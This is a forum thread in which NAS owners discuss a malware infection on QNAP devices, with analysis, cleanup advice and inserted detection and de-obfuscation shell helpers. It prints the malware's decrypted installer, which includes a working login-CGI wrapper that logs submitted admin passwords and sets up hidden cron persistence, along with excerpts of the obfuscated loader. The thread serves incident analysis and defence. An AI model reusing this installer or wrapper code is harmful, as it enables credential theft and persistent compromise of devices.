- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" 
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && { 
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` 

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then 
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } 
true;
}


#]
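The decrypted script above persists through a crontab line pointing at a hidden directory on a data volume, keeps a .BOOT_TIME marker at the top of that volume, and swaps authLogin.cgi for a shell wrapper that appends POST bodies to .log/.cgi_log while keeping the original as QTSauthLogin.cgi. As an added example that is not part of this thread, the following POSIX shell functions look for exactly those leftovers. Two assumptions: /etc/config is the QTS configuration directory (the script's ${confdir}), and the ROOT variable points the checks at a copied filesystem tree instead of the live NAS.

```shell
#!/bin/sh
# Added example, not code from the thread: look for the leftovers that the
# decrypted autorun.sh above creates. Path patterns come from that script.
# Assumptions: /etc/config is the QTS config directory (the script's
# ${confdir}); ROOT, when set, points at a copied tree instead of a live NAS.

# Crontab lines that run a .sh from a hidden directory directly under a data
# volume or /mnt/HDA_ROOT, i.e. the script's "${bdir}/.${ipath}/${crons}.sh".
# The script inserts its line a third of the way down the file, not at the
# end, so the whole crontab is searched.
find_hidden_cron_entries() {
    crontab="$1"
    [ -f "$crontab" ] || return 1
    grep -E '(/share/[^/ ]+|/mnt/HDA_ROOT)/\.[^/ ]+/[^/ ]+\.sh' "$crontab"
}

# authLogin.cgi replaced by the credential-logging wrapper: the wrapper is a
# shell script that execs the renamed original, QTSauthLogin.cgi. Returns 0
# and prints the reason when either trace is present.
check_authlogin() {
    cgidir="$1"
    if [ -f "$cgidir/QTSauthLogin.cgi" ]; then
        echo "renamed original login CGI present: $cgidir/QTSauthLogin.cgi"
        return 0
    fi
    if [ -f "$cgidir/authLogin.cgi" ] && grep -q 'QTSauthLogin.cgi' "$cgidir/authLogin.cgi"; then
        echo "authLogin.cgi refers to QTSauthLogin.cgi: wrapper in place"
        return 0
    fi
    return 1
}

# The capture file (.log/.cgi_log) and the .BOOT_TIME marker, both written at
# the top of whichever volume the script picked as ${bdir}.
find_volume_artefacts() {
    root="$1"
    found=1
    for d in "$root"/share/* "$root/mnt/HDA_ROOT"; do
        [ -d "$d" ] || continue
        for f in "$d/.log/.cgi_log" "$d/.BOOT_TIME"; do
            [ -e "$f" ] && { echo "$f"; found=0; }
        done
    done
    return $found
}

# Distinct REMOTE_ADDR values in a capture file; each line is "addr:POSTDATA".
# Assumes IPv4 sources, since an IPv6 address would itself contain colons.
list_capture_sources() {
    [ -f "$1" ] || return 1
    cut -d: -f1 "$1" | sort -u
}

# Run every check; an empty ROOT means the live system.
run_hunt() {
    root="$1"
    hits=0
    find_hidden_cron_entries "$root/etc/config/crontab" && hits=$((hits + 1))
    check_authlogin "$root/home/httpd/cgi-bin" && hits=$((hits + 1))
    find_volume_artefacts "$root" && hits=$((hits + 1))
    echo "suspicious findings: $hits"
}

run_hunt "${ROOT:-}"
```

The capture file is worth reading before it is deleted: list_capture_sources gives the addresses that submitted a login while the wrapper was in place, which tells you whose credentials to rotate and where the logins came from.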
Hi MouseTick,
Thanks for the reply! Can you tell us how to "decrypt" the shell script? I'd like to look into mine and see if I can find anything myself.
I don't get the point why to disconnect from LAN?
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

Also another question, is the following cron job safe:
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 »

somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
unfortunately i do :cry:
User avatar
Don
Guru
Posts: 12289
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don »

You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.
Use the forum search feature before posting.

Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
Mousetick
Experience counts
Posts: 1081
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick »

somy1982 wrote:Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also, some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.

I greatly discourage you from trying to do this if you don't fully understand what I just said and what follows.

Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).

Code:

#!/bin/sh

WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx

...remainder omitted for brevity...
Before neutering

Code:

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
After neutering

Code:

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Executing the neutered script produces the following output, another encrypted script:

Code:

#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/

... remainder omitted for brevity ...
Before neutering

Code:

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
After neutering

Code:

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Executing the neutered 2nd-stage script produces the following output, the unencrypted autorun.sh:

Code:

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }

... remainder omitted for brevity ...
Post your script(s) here and I'll see what I can do.
I don't get the point why to disconnect from LAN?
As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.
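The neutering step Mousetick describes, as an added example that is not from this thread: a sed-based helper that removes the pipe into sh or bash after the heredoc token, exactly as the two "Before neutering" / "After neutering" pairs above do by hand, plus a counter that says whether another pass is still needed. The regular expression is an assumption fitted to the two obfuscated lines shown here, including the empty-variable padding (${name}, $name, $"") the obfuscator puts around sh and bash; other obfuscators may differ.

```shell
#!/bin/sh
# Added example, not from the thread: automate the "neutering" step. Where a
# line pipes a heredoc into sh or bash, drop everything after the heredoc
# token so the decoder stage prints the next stage instead of running it.
# Assumption: the regular expression is fitted to the two obfuscated lines
# shown in this thread, including the empty-variable padding (${name}, $name,
# $"") the obfuscator puts around sh/bash; other obfuscators may differ.

# ERE matching '<< "TOKEN" | <padding>sh<padding>' or the bash variant, with
# the heredoc redirection captured as group 1.
pipe_to_shell_pattern() {
    pad='([$][{][A-Za-z0-9_]*[}]|[$][A-Za-z0-9_]+|[$]"")*'
    printf '%s' '(<<[[:space:]]*"?[A-Za-z0-9_]+"?)[[:space:]]*[|][[:space:]]*'"$pad"'(ba)?sh'"$pad"'[[:space:]]*$'
}

# Read a stage (file argument, or stdin when none) and write its neutered
# form to stdout. Lines that do not pipe a heredoc into a shell are copied
# unchanged, so the encrypted heredoc body is preserved for the decoder.
neuter_stage() {
    sed -E "s/$(pipe_to_shell_pattern)/\\1/" "$@"
}

# Number of lines in a file that still pipe a heredoc into a shell; zero means
# the stage from the previous pass needs no further neutering.
count_shell_pipes() {
    grep -E -c "$(pipe_to_shell_pattern)" "$1" || true
}
```

Usage follows the two passes shown above: `neuter_stage autorun.sh > stage1.sh`, confirm `count_shell_pipes stage1.sh` prints 0, run stage1.sh in an isolated throwaway environment and capture its stdout as stage2.sh, then repeat on stage2.sh until the output is readable shell. A count of 0 on a stage that still looks encrypted means that stage uses a different execution trick and has to be read by hand.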
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

benzo83 wrote:
somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
unfortunately i do :cry:
Check all apps under the .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones malware remover claimed recovered!! When exactly on 25/8 was the file created? Mine was around 9am Europe time.
Mousetick
Experience counts
Posts: 1081
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick »

Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
AutorunDisable.png
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
AutorunDisable.png
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
Thanks, have done that and removed the autorun.sh. Deleted everything I could find and also removed all suspicious cron jobs. The NAS has been restarted and the jobs seem to be removed permanently.
Today I went into the .qpkg folder and found many files had been hacked, so I reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch :-(
Does anybody know if QNAP provides a way to completely reset the QTS OS and leave data unchanged?